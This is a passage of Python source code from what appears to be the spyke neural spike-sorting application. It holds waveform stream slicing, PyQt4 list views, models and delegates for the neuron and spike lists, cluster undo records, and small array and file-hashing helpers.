return self._fname\n\n fname = property(get_fname)\n\n def get_datetime(self):\n \"\"\".tsf files don't currently have a datetime stamp, return Unix epoch instead\"\"\"\n return UNIXEPOCH\n\n datetime = property(get_datetime)\n \n def __getstate__(self):\n \"\"\"Get object state for pickling\"\"\"\n # copy it cuz we'll be making changes, this is fast because it's just a shallow copy\n d = self.__dict__.copy()\n try: del d['wavedata'] # takes up way too much space\n except KeyError: pass\n return d\n\n def __getitem__(self, key):\n \"\"\"Called when Stream object is indexed into using [] or with a slice object,\n indicating start and end timepoints in us. Returns the corresponding WaveForm\n object with the full set of chans\"\"\"\n if key.step not in [None, 1]:\n raise ValueError('unsupported slice step size: %s' % key.step)\n return self(key.start, key.stop, self.chans)\n\n def __call__(self, start, stop, chans=None):\n \"\"\"Called when Stream object is called using (). start and stop indicate start\n and end timepoints in us. Returns the corresponding WaveForm object with just the\n specificed chans\"\"\"\n if chans == None:\n chans = self.chans\n if not set(chans).issubset(self.chans):\n raise ValueError(\"requested chans %r are not a subset of available enabled \"\n \"chans %r in %s stream\" % (chans, self.chans, self.kind))\n nchans = len(chans)\n rawtres = self.rawtres\n resample = self.sampfreq != self.rawsampfreq or self.shcorrect == True\n if resample:\n # excess data in us at either end, to eliminate interpolation distortion at\n # key.start and key.stop\n xs = KERNELSIZE * rawtres\n else:\n xs = 0\n # get a slightly greater range of raw data (with xs) than might be needed:\n t0xsi = (start - xs) // rawtres # round down to nearest mult of rawtres\n t1xsi = ((stop + xs) // rawtres) + 1 # round up to nearest mult of rawtres\n # stay within stream limits, thereby avoiding interpolation edge effects:\n t0xsi = max(t0xsi, self.t0 // rawtres)\n t1xsi = min(t1xsi, self.t1 // rawtres)\n # convert back to us:\n t0xs = t0xsi * rawtres\n t1xs = t1xsi * rawtres\n tsxs = np.arange(t0xs, t1xs, rawtres)\n ntxs = len(tsxs)\n # init data as int32 so we have bitwidth to rescale and zero, then convert to int16\n dataxs = np.int32(self.wavedata[:, t0xsi:t1xsi])\n\n # bitshift left by 4 to scale 12 bit values to use full 16 bit dynamic range, same as\n # * 2**(16-12) == 16. This provides more fidelity for interpolation, reduces uV per\n # AD to about 0.02\n if self.bitshift:\n dataxs <<= self.bitshift # data is still int32 at this point\n\n # do any resampling if necessary:\n if resample:\n #tresample = time.time()\n dataxs, tsxs = self.resample(dataxs, tsxs, chans)\n #print('resample took %.3f sec' % (time.time()-tresample))\n else: # don't resample, just cut out self.chans data, if necessary\n if range(nchans) != list(self.chans):\n # some chans are disabled. 
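# Self-contained sketch of the __getstate__ pattern used above to keep the
# bulky wavedata array out of pickles (hypothetical class, not SimpleStream
# itself; pop() replaces the original's try/del, same effect):
import pickle
import numpy as np

class BigThing(object):
    def __init__(self):
        self.meta = 'example'
        self.wavedata = np.zeros((64, 100000), dtype=np.int16)  # bulky

    def __getstate__(self):
        d = self.__dict__.copy()   # shallow copy, cheap
        d.pop('wavedata', None)    # exclude the bulk data from the pickle
        return d

assert len(pickle.dumps(BigThing())) < 1000   # metadata only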
This is kind of a hack, but works\n # because ADchans map to probe chans 1 to 1, and both start from 0\n dataxs = dataxs[self.chans]\n\n # now trim down to just the requested time range:\n lo, hi = tsxs.searchsorted([start, stop])\n data = dataxs[:, lo:hi]\n ts = tsxs[lo:hi]\n\n # should be safe to convert back down to int16 now:\n data = np.int16(data)\n return WaveForm(data=data, ts=ts, chans=chans)\n\n \nclass SpykeToolWindow(QtGui.QMainWindow):\n \"\"\"Base class for all of spyke's tool windows\"\"\"\n def __init__(self, parent, flags=Qt.Tool):\n QtGui.QMainWindow.__init__(self, parent, flags)\n self.maximized = False\n\n def keyPressEvent(self, event):\n key = event.key()\n if key == Qt.Key_F11:\n self.toggleMaximized()\n else:\n QtGui.QMainWindow.keyPressEvent(self, event) # pass it on\n\n def mouseDoubleClickEvent(self, event):\n \"\"\"Doesn't catch window titlebar doubleclicks for some reason (window manager\n catches them?). Have to doubleclick on a part of the window with no widgets in it\"\"\"\n self.toggleMaximized()\n\n def closeEvent(self, event):\n # remove 'Window' from class name\n windowtype = type(self).__name__.replace('Window', '')\n self.parent().HideWindow(windowtype)\n\n def toggleMaximized(self):\n if not self.maximized:\n self.normalPos, self.normalSize = self.pos(), self.size()\n dw = QtGui.QDesktopWidget()\n rect = dw.availableGeometry(self)\n self.setGeometry(rect)\n self.maximized = True\n else: # restore\n self.resize(self.normalSize)\n self.move(self.normalPos)\n self.maximized = False\n\n\nclass SpykeListView(QtGui.QListView):\n def __init__(self, parent):\n QtGui.QListView.__init__(self, parent)\n self.sortwin = parent\n #self.setSelectionBehavior(QTableWidget.SelectRows)\n self.setSelectionMode(QtGui.QListView.ExtendedSelection)\n self.setLayoutMode(QtGui.QListView.Batched) # prevents lockup during huge layout ops\n # Setting resize mode to \"adjust\" sometimes results in a bug where Qt seems to\n # be reflowing the contents many times over before it finally stops, resulting in\n # very slow operations when changing list contents (like adding/removing neurons).\n # But, with this disabled, the contents no longer reflow, and you're forced to use\n # scrollbars unnecessarily to see all the list contents. 
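# Minimal PyQt4-style sketch of the keyPressEvent-override pattern these tool
# windows use (F11 toggles maximized state). Note this variant flips Qt's
# window-state flag instead of saving/restoring geometry manually as
# SpykeToolWindow.toggleMaximized() does above; assumes PyQt4, as imported by
# the surrounding code.
from PyQt4 import QtGui
from PyQt4.QtCore import Qt

class ToggleWindow(QtGui.QMainWindow):
    def keyPressEvent(self, event):
        if event.key() == Qt.Key_F11:
            # toggle the maximized bit of the window state:
            self.setWindowState(self.windowState() ^ Qt.WindowMaximized)
        else:
            QtGui.QMainWindow.keyPressEvent(self, event)  # pass it on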
This might also be\n # interacting with the setWrapping and/or setBatchSize features:\n #self.setResizeMode(QtGui.QListView.Adjust) # recalculates layout on resize\n self.setUniformItemSizes(True) # speeds up listview\n self.setFlow(QtGui.QListView.LeftToRight) # default is TopToBottom\n self.setWrapping(True)\n self.setBatchSize(300)\n #self.setViewMode(QtGui.QListView.IconMode)\n\n def mousePressEvent(self, event):\n sw = self.sortwin\n buttons = event.buttons()\n if buttons == QtCore.Qt.LeftButton:\n QtGui.QListView.mousePressEvent(self, event) # handle as usual\n else:\n self.sortwin.mousePressEvent(event) # pass on up to Sort window\n\n def keyPressEvent(self, event):\n key = event.key()\n modifiers = event.modifiers()\n ctrldown = bool(Qt.ControlModifier & modifiers)\n ctrlup = not ctrldown\n if (key in [Qt.Key_M, Qt.Key_G, Qt.Key_Equal, Qt.Key_Minus, Qt.Key_Slash, Qt.Key_P,\n Qt.Key_Backslash, Qt.Key_NumberSign, Qt.Key_F, Qt.Key_R, Qt.Key_B,\n Qt.Key_BracketLeft, Qt.Key_BracketRight,\n Qt.Key_Comma, Qt.Key_Period, Qt.Key_C, Qt.Key_T]\n or ctrlup and key == Qt.Key_Space):\n event.ignore() # pass it on up to the parent\n else:\n QtGui.QListView.keyPressEvent(self, event) # handle it as usual\n\n def selectionChanged(self, selected, deselected, prefix=None):\n \"\"\"Plot neurons or spikes on list item selection\"\"\"\n QtGui.QListView.selectionChanged(self, selected, deselected)\n panel = self.sortwin.panel\n addis = [ i.data().toInt()[0] for i in selected.indexes() ]\n remis = [ i.data().toInt()[0] for i in deselected.indexes() ]\n panel.removeItems([ prefix+str(i) for i in remis ])\n # for speed, don't allow more than MAXNSPIKEPLOTS spikes to be plotted in sort panel:\n if prefix == 's':\n '''\n # note that self.nrowsSelected seems to report nrows selected *including* those\n # added and removed by the current selection event\n net = len(addis) - len(remis)\n print('num selected %d' % self.nrowsSelected)\n print('net change is %d' % net)\n nwereselected = self.nrowsSelected - net\n print('num were selected is %d' % nwereselected)\n maxnadd = max(MAXNSPIKEPLOTS - nwereselected + len(remis), 0)\n print('maxnadd is %d' % maxnadd)\n addis = addis[:maxnadd]\n '''\n nadd = len(addis)\n maxnadd = max(MAXNSPIKEPLOTS - self.nrowsSelected + nadd, 0)\n if maxnadd == 0:\n return\n if nadd > maxnadd:\n # if we can't add all the requested spikes to the sort panel without\n # exceeding MAXNSPIKEPLOTS, then randomly sample however many we can still\n # add (maxnadd), and add them to the sort panel\n print('adding %d randomly sampled plots of %d selected spikes'\n % (maxnadd, self.nrowsSelected))\n addis = random.sample(addis, maxnadd)\n panel.maxed_out = True\n else:\n panel.maxed_out = False\n #t0 = time.time()\n panel.addItems([ prefix+str(i) for i in addis ])\n #print('addItems took %.3f sec' % (time.time()-t0))\n #print(\"done selchanged, %r, addis=%r, remis=%r\" % (prefix, addis, remis))\n\n def updateAll(self):\n self.model().updateAll()\n\n def get_nrows(self):\n return self.model().rowCount()\n\n nrows = property(get_nrows)\n\n def selectRows(self, rows, on=True, scrollTo=False):\n \"\"\"Row selection in listview is complex. 
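# Standalone sketch of the plot-cap arithmetic in selectionChanged() above:
# when a new selection would push the sort panel past MAXNSPIKEPLOTS, only a
# random subset of the newly selected ids is plotted. Illustrative values.
import random

MAXNSPIKEPLOTS = 100   # illustrative cap

def cap_addis(addis, nrows_selected):
    """nrows_selected counts rows selected *including* this event's changes."""
    maxnadd = max(MAXNSPIKEPLOTS - nrows_selected + len(addis), 0)
    if len(addis) > maxnadd:
        addis = random.sample(addis, maxnadd)   # random subset to plot
    return addis

assert len(cap_addis(list(range(50)), nrows_selected=130)) == 20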
This makes it simpler\"\"\"\n ## TODO: There's a bug here, where if you select the last two neurons in nlist,\n ## (perhaps these last two need to be near a list edge), merge them, and then\n ## undo,then merge again (instead of just redoing), then undo again, they're\n ## both selected, but only the first is replotted because the selchanged event\n ## is only passed the first of the two as being newly selected. If however,\n ## before remerging, you clear the selection, or select something else, and then\n ## go back and select those same two neurons and merge, and undo, it works fine,\n ## and the selchanged event gets both items as newly selected. Seems like a Qt\n ## bug, or at least some very subtle timing problem of some kind. This might have\n ## something to do with reflow when changing list contents, but even resetting\n ## listview behaviour to default doesn't make this go away. Also, seems to happen\n ## for selection of one index at a time, and for doing it all in one go with a\n ## QItemSelection.\n \n rows = toiter(rows)\n m = self.model()\n sm = self.selectionModel()\n if on:\n flag = sm.Select\n else:\n flag = sm.Deselect\n #print('start select=%r loop for rows %r' % (on, rows))\n '''\n # unnecessarily emits nrows selectionChanged signals, causes slow\n # plotting in mpl commit 50fc548465b1525255bc2d9f66a6c7c95fd38a75 (pre\n # 1.0) and later:\n [ sm.select(m.index(row), flag) for row in rows ]\n '''\n # emits single selectionChanged signal, more efficient, but causes a bit of\n # flickering, or at least used to in Qt 4.7.0:\n sel = QtGui.QItemSelection()\n for row in rows:\n index = m.index(row)\n #print('row: %r, index: %r' % (row, index))\n sel.select(index, index) # topleft to bottomright\n #print('sel has indexes, rows, cols, data:')\n #for index in sel.indexes():\n # print(index, index.row(), index.column(), index.data())\n sm.select(sel, flag)\n #print('end select loop')\n '''\n # constantly scrolling to selection slows everything quite noticeably, especially\n # when using the spike selection sortwin.slider\n if scrollTo and on and len(rows) > 0: # scroll to last row that was just selected\n self.scrollTo(m.index(rows[-1]))\n '''\n def selectedRows(self):\n \"\"\"Return list of selected rows\"\"\"\n return [ i.row() for i in self.selectedIndexes() ]\n\n def rowSelected(self, row):\n \"\"\"Simple way to check if a row is selected\"\"\"\n return self.model().index(row) in self.selectedIndexes()\n\n def get_nrowsSelected(self):\n return len(self.selectedIndexes())\n\n nrowsSelected = property(get_nrowsSelected)\n\n def selectRandom(self, start, stop, nsamples):\n \"\"\"Select random sample of rows\"\"\"\n start = max(0, start)\n if stop == -1:\n stop = self.nrows\n stop = min(self.nrows, stop)\n nrows = stop - start\n nsamples = min(nsamples, nrows)\n rows = random.sample(xrange(start, stop), nsamples)\n self.selectRows(rows, scrollTo=False)\n\n\nclass NList(SpykeListView):\n \"\"\"Neuron list view\"\"\"\n def __init__(self, parent):\n SpykeListView.__init__(self, parent)\n self.setModel(NListModel(parent))\n self.setItemDelegate(NListDelegate(parent))\n self.connect(self, QtCore.SIGNAL(\"activated(QModelIndex)\"),\n self.on_actionItem_activated)\n\n def selectionChanged(self, selected, deselected):\n SpykeListView.selectionChanged(self, selected, deselected, prefix='n')\n selnids = [ i.data().toInt()[0] for i in self.selectedIndexes() ]\n #if 1 <= len(selnids) <= 3: # populate nslist if exactly 1, 2 or 3 neurons selected\n self.sortwin.nslist.neurons = [ 
self.sortwin.sort.neurons[nid] for nid in selnids ]\n #else:\n # self.sortwin.nslist.neurons = []\n\n def on_actionItem_activated(self, index):\n sw = self.sortwin\n sw.parent().ui.plotButton.click()\n\n\nclass NSList(SpykeListView):\n \"\"\"Spike list view\"\"\"\n def __init__(self, parent):\n SpykeListView.__init__(self, parent)\n self.setModel(NSListModel(parent))\n self.connect(self, QtCore.SIGNAL(\"activated(QModelIndex)\"),\n self.on_actionItem_activated)\n\n def selectionChanged(self, selected, deselected):\n SpykeListView.selectionChanged(self, selected, deselected, prefix='s')\n\n def on_actionItem_activated(self, index):\n sw = self.sortwin\n if sw.sort.stream.is_open():\n sid = self.sids[index.row()]\n spike = sw.sort.spikes[sid]\n sw.parent().seek(spike['t'])\n else:\n sw.parent().ui.plotButton.click()\n\n def get_neurons(self):\n return self.model().neurons\n\n def set_neurons(self, neurons):\n \"\"\"Every time neurons are set, clear any existing selection and update data model\"\"\"\n self.clearSelection() # remove any plotted sids, at least for now\n self.model().neurons = neurons\n\n neurons = property(get_neurons, set_neurons)\n\n def get_nids(self):\n return np.asarray([ neuron.id for neuron in self.model().neurons ])\n\n nids = property(get_nids)\n\n def get_sids(self):\n return self.model().sids\n\n sids = property(get_sids)\n\n def keyPressEvent(self, event):\n sw = self.sortwin\n key = event.key()\n # passing horizontal keys to nlist assumes nslist is a single column\n # and are therefore not needed:\n if key in [Qt.Key_Enter, Qt.Key_Return, Qt.Key_Left, Qt.Key_Right]:\n sw.nlist.keyPressEvent(event) # pass on to nlist\n else:\n SpykeListView.keyPressEvent(self, event) # handle it as usual\n\n def selectRandom(self, nsamples):\n \"\"\"Select up to nsamples random rows per neuron\"\"\"\n if self.model().sliding == True:\n self.neurons = self.neurons # trigger NSListModel.set_neurons() call\n self.model().sliding = False\n for neuron in self.neurons:\n allrows = self.sids.searchsorted(neuron.sids)\n nsamples = min(nsamples, len(allrows))\n rows = random.sample(allrows, nsamples)\n self.selectRows(rows, scrollTo=False)\n\n\nclass USList(SpykeListView):\n \"\"\"Unsorted spike list view\"\"\"\n def __init__(self, parent):\n SpykeListView.__init__(self, parent)\n self.setModel(USListModel(parent))\n self.connect(self, QtCore.SIGNAL(\"activated(QModelIndex)\"),\n self.on_actionItem_activated)\n\n def keyPressEvent(self, event):\n sw = self.sortwin\n key = event.key()\n if key in [Qt.Key_Enter, Qt.Key_Return]:\n sw.nlist.keyPressEvent(event) # pass on to nlist\n else:\n SpykeListView.keyPressEvent(self, event) # handle it as usual\n\n def selectionChanged(self, selected, deselected):\n SpykeListView.selectionChanged(self, selected, deselected, prefix='s')\n\n def on_actionItem_activated(self, index):\n sw = self.sortwin\n if sw.sort.stream.is_open():\n sid = sw.sort.usids[index.row()]\n spike = sw.sort.spikes[sid]\n sw.parent().seek(spike['t'])\n else:\n sw.parent().ui.plotButton.click()\n\n def selectRandom(self, nsamples):\n \"\"\"Select up to nsamples random rows\"\"\"\n SpykeListView.selectRandom(self, 0, -1, nsamples)\n\n\nclass SpykeAbstractListModel(QtCore.QAbstractListModel):\n def __init__(self, parent):\n QtCore.QAbstractListModel.__init__(self, parent)\n self.sortwin = parent\n\n def updateAll(self):\n \"\"\"Emit dataChanged signal so that view updates itself immediately.\n Hard to believe this doesn't already exist in some form\"\"\"\n i0 = self.createIndex(0, 0) 
# row, col\n i1 = self.createIndex(self.rowCount()-1, 0) # seems this isn't necessary\n # seems to refresh all, though should only refresh 1st row:\n #self.dataChanged.emit(i0, i0)\n self.dataChanged.emit(i0, i1) # refresh all\n\n\nclass NListModel(SpykeAbstractListModel):\n \"\"\"Model for neuron list view\"\"\"\n def rowCount(self, parent=None):\n try:\n # update nlist tooltip before returning, only +ve nids count as neurons:\n sort = self.sortwin.sort\n nneurons = (np.asarray(sort.norder) > 0).sum()\n ngood = len(sort.get_good())\n self.sortwin.nlist.setToolTip(\"Neuron list\\n%d neurons, %d good\"\n % (nneurons, ngood))\n return len(sort.norder)\n except AttributeError: # sort doesn't exist\n self.sortwin.nlist.setToolTip(\"Neuron list\")\n return 0\n\n def data(self, index, role=Qt.DisplayRole):\n if index.isValid():\n neurons = self.sortwin.sort.neurons\n norder = self.sortwin.sort.norder\n try:\n nid = norder[index.row()]\n except IndexError:\n print('WARNING: tried to index non-existent row %d' % index.row())\n #print('.data(): row=%d, val=%d' % (index.row(), nid))\n if role == Qt.DisplayRole:\n return nid # no need to use QVariant() apparently\n elif role == Qt.ToolTipRole:\n neuron = neurons[nid]\n try:\n chan = neuron.chan\n except ValueError: # probably not enough overlapping chans for a template\n chan = None\n pos = neuron.cluster.pos\n return ('nid: %d\\n' % nid +\n '%d spikes\\n' % neuron.nspikes +\n 'chan: %r\\n' % chan +\n 't: %d us\\n' % pos['t'] +\n 'dt: %.4g us\\n' % pos['dt'] +\n 'x0: %.4g um\\n' % pos['x0'] +\n 'y0: %.4g um\\n' % pos['y0'] +\n 'Vpp: %.4g uV\\n' % pos['Vpp'] +\n 'sx: %.4g um' % pos['sx'])\n # this stuff is handled in NListDelegate:\n '''\n elif role == Qt.ForegroundRole:\n if nid in self.sortwin.sort.get_good():\n return QtGui.QBrush(QtGui.QColor(255, 255, 255))\n elif role == Qt.BackgroundRole:\n if nid in self.sortwin.sort.get_good():\n return QtGui.QBrush(QtGui.QColor(0, 128, 0))\n '''\nclass SListModel(SpykeAbstractListModel):\n \"\"\"Base model for spike list models\"\"\"\n def spiketooltip(self, spike):\n return ('sid: %d\\n' % spike['id'] +\n 'nid: %d\\n' % spike['nid'] +\n 'chan: %d\\n' % spike['chan'] +\n 't: %d us\\n' % spike['t'] +\n 'dt: %.4g us\\n' % spike['dt'] +\n 'x0: %.4g um\\n' % spike['x0'] +\n 'y0: %.4g um\\n' % spike['y0'] +\n 'Vpp: %.4g uV\\n' % spike['Vpp'] +\n 'sx: %.4g um' % spike['sx'])\n\n\nclass NSListModel(SListModel):\n \"\"\"Model for neuron spikes list view\"\"\"\n def __init__(self, parent):\n SpykeAbstractListModel.__init__(self, parent)\n self._neurons = []\n self.nspikes = 0\n self.sids = np.empty(0, dtype=np.int32)\n\n def get_neurons(self):\n return self._neurons\n\n def set_neurons(self, neurons):\n self._neurons = neurons\n if neurons:\n self.sids = np.concatenate([ neuron.sids for neuron in neurons ])\n self.sids.sort() # keep them sorted\n self.sortwin.slider.setEnabled(True)\n else:\n self.sids = np.empty(0, dtype=np.int32)\n self.sortwin.slider.setEnabled(False)\n self.nspikes = len(self.sids)\n # triggers new calls to rowCount() and data(), and critically, clears selection\n # before moving slider to pos 0, which triggers slider.valueChanged:\n self.reset()\n self.sortwin.slider.setValue(0) # reset position to 0\n self.sortwin.update_slider() # update limits and step sizes\n self.sliding = False\n\n neurons = property(get_neurons, set_neurons)\n\n def rowCount(self, parent=None):\n # update nslist tooltip before returning:\n self.sortwin.nslist.setToolTip(\"Sorted spike list\\n%d spikes\" % self.nspikes)\n 
return self.nspikes\n\n def data(self, index, role=Qt.DisplayRole):\n if index.isValid() and role in [Qt.DisplayRole, Qt.ToolTipRole]:\n sid = int(self.sids[index.row()])\n if role == Qt.DisplayRole:\n return sid\n elif role == Qt.ToolTipRole:\n spike = self.sortwin.sort.spikes[sid]\n return self.spiketooltip(spike)\n\n\nclass USListModel(SListModel):\n \"\"\"Model for unsorted spike list view\"\"\"\n def rowCount(self, parent=None):\n try:\n nspikes = len(self.sortwin.sort.usids)\n # update uslist tooltip before returning:\n self.sortwin.uslist.setToolTip(\"Unsorted spike list\\n%d spikes\" % nspikes)\n return nspikes\n except AttributeError: # sort doesn't exist\n self.sortwin.uslist.setToolTip(\"Unsorted spike list\")\n return 0\n\n def data(self, index, role=Qt.DisplayRole):\n if index.isValid() and role in [Qt.DisplayRole, Qt.ToolTipRole]:\n sid = int(self.sortwin.sort.usids[index.row()])\n if role == Qt.DisplayRole:\n return sid\n elif role == Qt.ToolTipRole:\n spike = self.sortwin.sort.spikes[sid]\n return self.spiketooltip(spike)\n\n\nclass NListDelegate(QtGui.QStyledItemDelegate):\n \"\"\"Delegate for neuron list view, modifies appearance of items\"\"\"\n def __init__(self, parent):\n QtGui.QStyledItemDelegate.__init__(self, parent)\n self.sortwin = parent\n palette = QtGui.QApplication.palette()\n self.selectedgoodbrush = QtGui.QBrush(QtGui.QColor(0, 0, 255)) # blue\n self.unselectedgoodbrush = QtGui.QBrush(QtGui.QColor(0, 128, 0)) # mid green\n self.selectedbrush = palette.highlight()\n self.unselectedbrush = palette.base()\n self.selectedgoodpen = QtGui.QPen(Qt.white)\n self.unselectedgoodpen = QtGui.QPen(Qt.white)\n self.selectedpen = QtGui.QPen(palette.highlightedText().color())\n self.unselectedpen = QtGui.QPen(palette.text().color())\n self.focusedpen = QtGui.QPen(Qt.gray, 0, Qt.DashLine)\n self.focusedpen.setDashPattern([1, 1])\n self.focusedpen.setCapStyle(Qt.FlatCap)\n\n def paint(self, painter, option, index):\n \"\"\"Change background colour for nids designated as \"good\"\"\"\n model = index.model()\n nid = model.data(index) # should come out as an int\n good = nid in self.sortwin.sort.get_good()\n # don't care whether self is active or inactive, only care about\n # selection, \"good\", and focused states\n selected = option.state & QtGui.QStyle.State_Selected\n focused = option.state & QtGui.QStyle.State_HasFocus\n painter.save()\n # paint background:\n painter.setPen(QtGui.QPen(Qt.NoPen))\n if selected:\n if good:\n painter.setBrush(self.selectedgoodbrush)\n else: # use default selection brush\n painter.setBrush(self.selectedbrush)\n else: # unselected\n if good:\n painter.setBrush(self.unselectedgoodbrush)\n else: # use default background brush\n painter.setBrush(self.unselectedbrush)\n painter.drawRect(option.rect)\n # paint focus rect:\n if focused:\n rect = copy(option.rect)\n painter.setBrush(Qt.NoBrush) # no need to draw bg again\n painter.setPen(self.focusedpen)\n rect.adjust(0, 0, -1, -1) # make space for outline\n painter.drawRect(rect)\n # paint foreground:\n value = index.data(Qt.DisplayRole)\n if selected:\n if good:\n painter.setPen(self.selectedgoodpen)\n else: # use default selection pen\n painter.setPen(self.selectedpen)\n else: # unselected\n if good:\n painter.setPen(self.unselectedgoodpen)\n else: # use default background pen\n painter.setPen(self.unselectedpen)\n text = value.toString()\n painter.drawText(option.rect, Qt.AlignCenter, text)\n painter.restore()\n\n\nclass ClusterTabSpinBox(QtGui.QSpinBox):\n \"\"\"Intercept CTRL+Z key event for 
cluster undo instead of spinbox edit undo\"\"\"\n def keyPressEvent(self, event):\n if event.key() == Qt.Key_Z and event.modifiers() == Qt.ControlModifier:\n self.topLevelWidget().on_actionUndo_triggered()\n else:\n QtGui.QSpinBox.keyPressEvent(self, event) # handle it as usual\n\n\nclass ClusterTabDoubleSpinBox(QtGui.QDoubleSpinBox):\n \"\"\"Intercept CTRL+Z key event for cluster undo instead of spinbox edit undo\"\"\"\n def keyPressEvent(self, event):\n if event.key() == Qt.Key_Z and event.modifiers() == Qt.ControlModifier:\n self.topLevelWidget().on_actionUndo_triggered()\n else:\n QtGui.QDoubleSpinBox.keyPressEvent(self, event) # handle it as usual\n\n\nclass ClusteringGroupBox(QtGui.QGroupBox):\n \"\"\"Make ENTER key event activate the cluster button\"\"\"\n def keyPressEvent(self, event):\n if event.key() in [Qt.Key_Enter, Qt.Key_Return]:\n self.topLevelWidget().ui.clusterButton.click()\n else:\n QtGui.QGroupBox.keyPressEvent(self, event) # handle it as usual\n\n\nclass PlottingGroupBox(QtGui.QGroupBox):\n \"\"\"Make ENTER key event activate the plot button\"\"\"\n def keyPressEvent(self, event):\n if event.key() in [Qt.Key_Enter, Qt.Key_Return]:\n self.topLevelWidget().ui.plotButton.click()\n else:\n QtGui.QGroupBox.keyPressEvent(self, event) # handle it as usual\n\n\nclass XCorrsGroupBox(QtGui.QGroupBox):\n \"\"\"Make ENTER key event activate the correlograms plot button\"\"\"\n def keyPressEvent(self, event):\n if event.key() in [Qt.Key_Enter, Qt.Key_Return]:\n self.topLevelWidget().ui.plotXcorrsButton.click()\n else:\n QtGui.QGroupBox.keyPressEvent(self, event) # handle it as usual\n\n\nclass SpikeSelectionSlider(QtGui.QSlider):\n \"\"\"Make ENTER key event activate the plot button\"\"\"\n def keyPressEvent(self, event):\n if event.key() in [Qt.Key_Enter, Qt.Key_Return]:\n self.topLevelWidget().spykewindow.ui.plotButton.click()\n else:\n QtGui.QSlider.keyPressEvent(self, event) # handle it as usual\n\n\nclass Stack(list):\n \"\"\"A list that doesn't allow -ve indices\"\"\"\n def __getitem__(self, key):\n if key < 0:\n raise IndexError('stack index %d out of range' % key)\n return list.__getitem__(self, key)\n\n\nclass ClusterChange(object):\n \"\"\"Stores info for undoing/redoing a change to any set of clusters\"\"\"\n def __init__(self, sids, spikes, message):\n self.sids = sids\n self.spikes = spikes\n self.message = message\n\n def __repr__(self):\n return self.message\n\n def save_old(self, oldclusters, oldnorder, oldgood):\n self.oldnids = self.spikes['nid'][self.sids] # this seems to create a copy\n self.oldunids = [ c.id for c in oldclusters ]\n self.oldposs = [ c.pos.copy() for c in oldclusters ]\n self.oldnormposs = [ c.normpos.copy() for c in oldclusters ]\n self.oldnorder = copy(oldnorder)\n self.oldgood = copy(oldgood)\n\n def save_new(self, newclusters, newnorder, newgood):\n self.newnids = self.spikes['nid'][self.sids] # this seems to create a copy\n self.newunids = [ c.id for c in newclusters ]\n self.newposs = [ c.pos.copy() for c in newclusters ]\n self.newnormposs = [ c.normpos.copy() for c in newclusters ]\n self.newnorder = copy(newnorder)\n self.newgood = copy(newgood)\n\ndef get_sha1(fname, blocksize=2**20):\n \"\"\"Gets the sha1 hash of file designated by fname (with full path)\"\"\"\n m = hashlib.sha1()\n with open(fname, 'rb') as f:\n # continually update hash until EOF\n while True:\n block = f.read(blocksize)\n if not block:\n break\n m.update(block)\n return m.hexdigest()\n\ndef intround(n):\n \"\"\"Round to the nearest integer, return an integer. 
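# Equivalent formulation of the block-wise hashing in get_sha1() above, using
# iter()'s callable/sentinel form instead of an explicit while loop; either
# way the file is read 1 MiB at a time, so arbitrarily large files hash in
# constant memory.
import hashlib

def file_sha1(fname, blocksize=2**20):
    m = hashlib.sha1()
    with open(fname, 'rb') as f:
        for block in iter(lambda: f.read(blocksize), b''):
            m.update(block)
    return m.hexdigest()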
Works on arrays.\n Saves on parentheses, nothing more\"\"\"\n if iterable(n): # it's a sequence, return as an int64 array\n return np.int64(np.round(n))\n else: # it's a scalar, return as normal Python int\n return int(round(n))\n\ndef iterable(x):\n \"\"\"Check if the input is iterable, stolen from numpy.iterable()\"\"\"\n try:\n iter(x)\n return True\n except TypeError:\n return False\n\ndef toiter(x):\n \"\"\"Convert to iterable. If input is iterable, returns it. Otherwise returns it in a list.\n Useful when you want to iterate over something (like in a for loop),\n and you don't want to have to do type checking or handle exceptions\n when it isn't a sequence\"\"\"\n if iterable(x):\n return x\n else:\n return [x]\n\ndef tocontig(x):\n \"\"\"Return C contiguous copy of array x if it isn't C contiguous already\"\"\"\n if not x.flags.c_contiguous:\n x = x.copy()\n return x\n'''\n# use np.vstack instead:\ndef cvec(x):\n \"\"\"Return x as a column vector. x must be a scalar or a vector\"\"\"\n x = np.asarray(x)\n assert x.squeeze().ndim in [0, 1]\n try:\n nrows = len(x)\n except TypeError: # x is scalar?\n nrows = 1\n x.shape = (nrows, 1)\n return x\n'''\ndef is_empty(x):\n \"\"\"Check if sequence is empty. There really should be a np.is_empty function\"\"\"\n print(\"WARNING: not thoroughly tested!!!\")\n x = np.asarray(x)\n if np.prod(x.shape) == 0:\n return True\n else:\n return False\n\ndef cut(ts, trange):\n \"\"\"Returns timestamps, where tstart <= timestamps <= tend\n Copied and modified from neuropy rev 149\"\"\"\n lo, hi = argcut(ts, trange)\n return ts[lo:hi] # slice it\n\ndef argcut(ts, trange):\n \"\"\"Returns timestamp slice indices, where tstart <= timestamps <= tend\n Copied and modified from neuropy rev 149\"\"\"\n tstart, tend = trange[0], trange[1]\n '''\n # this is what we're trying to do:\n return ts[ (ts >= tstart) & (ts <= tend) ]\n ts.searchsorted([tstart, tend]) method does it faster, because it assumes ts are ordered.\n It returns an index where the values would fit in ts. The index is such that\n ts[index-1] < value <= ts[index]. In this formula ts[ts.size]=inf and ts[-1]= -inf\n '''\n lo, hi = ts.searchsorted([tstart, tend]) # indices where tstart and tend would fit in ts\n # can probably avoid all this end inclusion code by using the 'side' kwarg,\n # not sure if I want end inclusion anyway:\n '''\n if tend == ts[min(hi, len(ts)-1)]:\n # if tend matches a timestamp (protect from going out of index bounds when checking)\n hi += 1 # inc to include a timestamp if it happens to exactly equal tend.\n # This gives us end inclusion\n hi = min(hi, len(ts)) # limit hi to max slice index (==max value index + 1)\n '''\n return lo, hi\n\ndef eucd(coords):\n \"\"\"Generates Euclidean distance matrix from a\n sequence of n m-dimensional coordinates. 
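# Quick numeric check of the searchsorted-based slicing in cut()/argcut()
# above (default side='left' semantics):
import numpy as np

ts = np.array([0, 10, 20, 30, 40, 50])
lo, hi = ts.searchsorted([15, 45])       # insertion points for 15 and 45
assert (lo, hi) == (2, 5)
assert list(ts[lo:hi]) == [20, 30, 40]   # timestamps within [15, 45]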
